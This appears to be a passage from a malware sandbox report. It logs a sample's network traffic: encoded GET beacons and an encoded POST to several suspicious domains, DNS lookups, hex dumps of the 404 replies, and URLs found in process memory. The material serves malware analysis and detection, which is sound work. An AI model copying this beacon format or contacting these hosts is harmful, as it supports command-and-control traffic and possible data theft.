                Source: global trafficHTTP traffic detected: GET /2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.127358.winConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.infohive.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sunnyz.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sfantulandrei.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.mffnow.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
                Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                Source: global trafficDNS traffic detected: DNS query: www.127358.win
                Source: global trafficDNS traffic detected: DNS query: www.infohive.website
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.sfantulandrei.info
                Source: global trafficDNS traffic detected: DNS query: www.mffnow.info
                Source: unknownHTTP traffic detected: POST /vjnn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.gk88top.topContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.gk88top.topReferer: http://www.gk88top.top/vjnn/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 62 5a 38 42 43 4a 48 4d 66 7a 6a 78 70 5a 43 4a 52 48 76 6c 69 66 46 31 4f 75 4f Data Ascii: WLtH=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeubZ8BCJHMfzjxpZCJRHvlifF1OuO
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:32:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IAews4r%2BdV1W5zco7n%2BwOoWPqvUS27R9vQDvypA0Njm%2BYEyeAZ5GRXi61ICjcmeFS6e8V5auBVtWPy5LYDD%2FTaoHVdw8srkjYIy55pcNZrTXJyAKNLda%2FEFXcTsowfXTLg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017eec8f467c78-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=836&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfufDZJLHbRNzoItasHbDw9Jz%2FsLEB7Lx98G1uiohN2AQvOx4wyEC15skc%2Fl2ZgwE27zKnjwAFJ%2FBzIH798R85lsLs%2FVRVrc6MX1LQZtu%2FvevMYJZZZtqwVkxZXLUhHgue8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017efc69fc1831-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=860&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oElepLcww0bT6vSsBAYuZmSBfA6vcTe67EQuvQQ7Rt40GJHsMKw5E9Kw4uEm5S%2FIixodfDMaPy2wWK0WTV5C8Kiu96aNsxsB25OpXhQHv0P1Zi2n4tBCTd42Y7K0WZNlxjY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f0c993042ac-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1766&rtt_var=883&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1873&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWJ7RYcwmQkKmK8PW0xudB3EKyR77NkIT5YfdVVVtmgDj8SvW1PXGgdyY4RdIjpirHvpkfZW5mmI%2FHtIwQJidUWKxK3%2BQBOuIsxei3Brb5GSEAkyLUjKSN74EWeMSRXhyHM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f1cad897cae-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1878&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:14 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3155508857.0000000004C06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mffnow.info
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3155508857.0000000004C06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mffnow.info/0pqe/
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
